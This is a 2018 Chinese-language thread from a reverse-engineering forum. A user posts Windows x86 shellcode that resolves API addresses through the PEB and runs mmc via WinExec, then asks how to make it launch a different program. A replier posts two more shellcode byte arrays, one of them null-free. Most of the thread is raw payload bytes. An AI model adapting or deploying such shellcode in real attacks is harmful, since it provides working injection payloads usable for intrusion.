首页
社区
课程
招聘
[讨论]这个shellcode怎么修改?
发表于: 2018-12-25 17:30 5054

[讨论]这个shellcode怎么修改?

2018-12-25 17:30
5054
char shellcode[]=
    "\xFC\x33\xD2\xB2\x30\x64\xFF\x32\x5A\x8B"
    "\x52\x0C\x8B\x52\x14\x8B\x72\x28\x33\xC9"
    "\xB1\x18\x33\xFF\x33\xC0\xAC\x3C\x61\x7C"
    "\x02\x2C\x20\xC1\xCF\x0D\x03\xF8\xE2\xF0"
    "\x81\xFF\x5B\xBC\x4A\x6A\x8B\x5A\x10\x8B"
    "\x12\x75\xDA\x8B\x53\x3C\x03\xD3\xFF\x72"
    "\x34\x8B\x52\x78\x03\xD3\x8B\x72\x20\x03"
    "\xF3\x33\xC9\x41\xAD\x03\xC3\x81\x38\x47"
    "\x65\x74\x50\x75\xF4\x81\x78\x04\x72\x6F"
    "\x63\x41\x75\xEB\x81\x78\x08\x64\x64\x72"
    "\x65\x75\xE2\x49\x8B\x72\x24\x03\xF3\x66"
    "\x8B\x0C\x4E\x8B\x72\x1C\x03\xF3\x8B\x14"
    "\x8E\x03\xD3\x52\x68\x78\x65\x63\x01\xFE"
    "\x4C\x24\x03\x68\x57\x69\x6E\x45\x54\x53"
    "\xFF\xD2\x68\x6d\x6d\x63\x01\xFE\x4C\x24"
    "\x03\x6A\x05\x33\xC9\x8D\x4C\x24\x04\x51"
    "\xFF\xD0\x68\x65\x73\x73\x01\x8B\xDF\xFE"
    "\x4C\x24\x03\x68\x50\x72\x6F\x63\x68\x45"
    "\x78\x69\x74\x54\xFF\x74\x24\x20\xFF\x54"
    "\x24\x20\x57\xFF\xD0";
是运行mmc的shellcode, 能修改增加成运行abcdfg的代码吗?

[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课

收藏
免费 0
支持
分享
最新回复 (7)
雪    币: 1564
活跃值: (3572)
能力值: ( LV13,RANK:420 )
在线值:
发帖
回帖
粉丝
2
"\x55\x89\xe5\x83\xec\x10\x68\x7f\xc0\xb4\x7b\xe8\x35\x00\x00\x00\x83\xc4\x04\xc7"
"\x45\xf8\x41\x8a\x6b\x61\xb9\x20\xe8\x08\x05\x8d\x55\xf0\x33\x4d\xf8\x89\x0a\xc7"
"\x45\xfc\xe6\x88\x58\x22\xb9\x80\xef\x58\x22\x33\x4d\xfc\x89\x4a\x04\x6a\x05\x52"
"\xff\xd0\x83\xc4\x10\x5d\xc3\xfa\xc3\x55\x53\x57\x56\x83\xec\x20\x64\xa1\x30\x00"
"\x00\x00\x8b\x40\x0c\x8b\x40\x14\x89\x44\x24\x0c\x89\xc1\x8b\x41\x10\x8b\x09\x85"
"\xc0\x89\x4c\x24\x10\x0f\x84\xb9\x00\x00\x00\x8b\x48\x3c\x8b\x54\x08\x78\x89\xd1"
"\x85\xd2\x89\x0c\x24\x0f\x84\xa5\x00\x00\x00\x8b\x0c\x24\x8b\x4c\x08\x0c\x8a\x14"
"\x08\x84\xd2\x74\x20\x8d\x4c\x08\x01\x31\xdb\xc1\xc3\x13\x0f\xbe\xf2\x80\xfa\x60"
"\x8a\x11\x8d\x7e\xe0\x0f\x4e\xfe\x41\x01\xfb\x84\xd2\x75\xe8\xeb\x02\x31\xdb\x8b"
"\x0c\x24\x8b\x4c\x08\x18\x85\xc9\x89\x4c\x24\x1c\x74\x66\x8b\x0c\x24\x89\x44\x24"
"\x04\x8b\x4c\x08\x20\x01\xc1\x89\x4c\x24\x18\x8d\x48\x01\x89\x4c\x24\x14\x31\xc9"
"\x8b\x54\x24\x18\x89\x4c\x24\x08\xbf\x00\x00\x00\x00\x8b\x34\x8a\x8a\x0c\x30\x84"
"\xc9\x74\x1e\x03\x74\x24\x14\x31\xff\xc1\xc7\x13\x0f\xbe\xe9\x80\xf9\x60\x8a\x0e"
"\x8d\x55\xe0\x0f\x4e\xd5\x46\x01\xd7\x84\xc9\x75\xe8\x01\xdf\x3b\x7c\x24\x34\x74"
"\x21\x8b\x4c\x24\x08\x8b\x44\x24\x04\x41\x3b\x4c\x24\x1c\x72\xb4\x8b\x44\x24\x10"
"\x3b\x44\x24\x0c\x0f\x85\x26\xff\xff\xff\x31\xc0\xeb\x1e\x8b\x44\x24\x04\x8b\x14"
"\x24\x8b\x74\x24\x08\x8b\x4c\x10\x24\x8b\x54\x10\x1c\x01\xc1\x01\xc2\x0f\xb7\x0c"
"\x71\x03\x04\x8a\x83\xc4\x20\x5e\x5f\x5b\x5d\xc3";
2018-12-26 00:55
0
雪    币: 87
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
3
xiaofu "\x55\x89\xe5\x83\xec\x10\x68\x7f\xc0\xb4\x7b\xe8\x35\x00\x00\x00\x83\xc4\x04\xc7" " ...
你发的这个代码我在xp上测试了,不能用啊,不管是把abcdfg.exe放入system32下面还是当前目录,都运行不了,我用计算器改名了,也不能运行计算器,其他系统我没再测试了。
我发的那个能修改吗? 那个是我在网上看到的,我试了下好多系统都能运行,就是不知道能不能修改原来的shellcode

另外请教你这个代码怎么生成的啊 怎么那么多00?
2018-12-26 15:04
0
雪    币: 1564
活跃值: (3572)
能力值: ( LV13,RANK:420 )
在线值:
发帖
回帖
粉丝
4
c++直接生成
没有.exe,另外发个没有0的版本
"\xeb\x0a\x58\x83\xc0\x11\x31\xc9\x31\xdb\xeb\x05\xe8\xf1\xff\xff\xff\x66\xb9\x64"
"\x01\x80\x38\x06\x75\x02\x88\x18\x40\x83\xe9\x01\x75\xf3"
"\x55\x89\xe5\x83\xec\x10\x68\x7f\xc0\xb4\x7b\xe8\x39\x06\x06\x06\x83\xc4\x04\xc7"
"\x45\xf8\xd5\x4c\x11\x75\xb8\xb4\x2e\x72\x11\x8d\x4d\xf0\x33\x45\xf8\x89\x01\xc7"
"\x45\xfc\xc4\xaf\x63\x09\xb8\xa2\xc8\x63\x09\x33\x45\xfc\x89\x41\x04\x6a\x05\x51"
"\xff\x15\x08\x30\xb6\x06\x83\xc4\x10\x5d\xc3\xfa\xc3\x55\x53\x57\x56\x83\xec\x20"
"\x64\xa1\x30\x06\x06\x06\x8b\x40\x0c\x8b\x40\x14\x89\x44\x24\x0c\x89\xc1\x8b\x41"
"\x10\x8b\x09\x85\xc0\x89\x4c\x24\x10\x0f\x84\xb9\x06\x06\x06\x8b\x48\x3c\x8b\x54"
"\x08\x78\x89\xd1\x85\xd2\x89\x0c\x24\x0f\x84\xa5\x06\x06\x06\x8b\x0c\x24\x8b\x4c"
"\x08\x0c\x8a\x14\x08\x84\xd2\x74\x20\x8d\x4c\x08\x01\x31\xdb\xc1\xc3\x13\x0f\xbe"
"\xf2\x80\xfa\x60\x8a\x11\x8d\x7e\xe0\x0f\x4e\xfe\x41\x01\xfb\x84\xd2\x75\xe8\xeb"
"\x02\x31\xdb\x8b\x0c\x24\x8b\x4c\x08\x18\x85\xc9\x89\x4c\x24\x1c\x74\x66\x8b\x0c"
"\x24\x89\x44\x24\x04\x8b\x4c\x08\x20\x01\xc1\x89\x4c\x24\x18\x8d\x48\x01\x89\x4c"
"\x24\x14\x31\xc9\x8b\x54\x24\x18\x89\x4c\x24\x08\xbf\x06\x06\x06\x06\x8b\x34\x8a"
"\x8a\x0c\x30\x84\xc9\x74\x1e\x03\x74\x24\x14\x31\xff\xc1\xc7\x13\x0f\xbe\xe9\x80"
"\xf9\x60\x8a\x0e\x8d\x55\xe0\x0f\x4e\xd5\x46\x01\xd7\x84\xc9\x75\xe8\x01\xdf\x3b"
"\x7c\x24\x34\x74\x21\x8b\x4c\x24\x08\x8b\x44\x24\x04\x41\x3b\x4c\x24\x1c\x72\xb4"
"\x8b\x44\x24\x10\x3b\x44\x24\x0c\x0f\x85\x26\xff\xff\xff\x31\xc0\xeb\x1e\x8b\x44"
"\x24\x04\x8b\x14\x24\x8b\x74\x24\x08\x8b\x4c\x10\x24\x8b\x54\x10\x1c\x01\xc1\x01"
"\xc2\x0f\xb7\x0c\x71\x03\x04\x8a\x83\xc4\x20\x5e\x5f\x5b\x5d\xc3";

2018-12-26 17:14
0
雪    币: 87
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
5
xiaofu c++直接生成没有.exe,另外发个没有0的版本"\xeb\x0a\x58\x83\xc0\x11\x31\xc9\x31\xdb\xeb\x05\xe8\xf1\xff\xff\xff\x ...
好吧,谢谢你了,还是不能运行,可能你这个只能在生成代码的电脑上运行吧。
2018-12-26 19:41
0
雪    币: 14543
活跃值: (17558)
能力值: ( LV12,RANK:290 )
在线值:
发帖
回帖
粉丝
6
xiaofu c++直接生成没有.exe,另外发个没有0的版本"\xeb\x0a\x58\x83\xc0\x11\x31\xc9\x31\xdb\xeb\x05\xe8\xf1\xff\xff\xff\x ...
大佬你好,我想问下你们的shellcode是怎么写的??有没有什么入门的文章推荐一下,本来想在看雪里发求助帖的,但是想来这么低级的问题问出来怕丢人,所以还请大佬帮帮我,多谢\(^o^)/~
2018-12-26 20:17
0
雪    币: 68
活跃值: (150)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
7
发了一个,觉得写的不好,还是删了吧
最后于 2018-12-26 22:35 被华哥huage编辑 ,原因:
2018-12-26 22:29
0
雪    币: 87
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
8
我已经解决啦,谢谢了大家了。
2018-12-27 23:17
0
游客
登录 | 注册 方可回帖
返回
//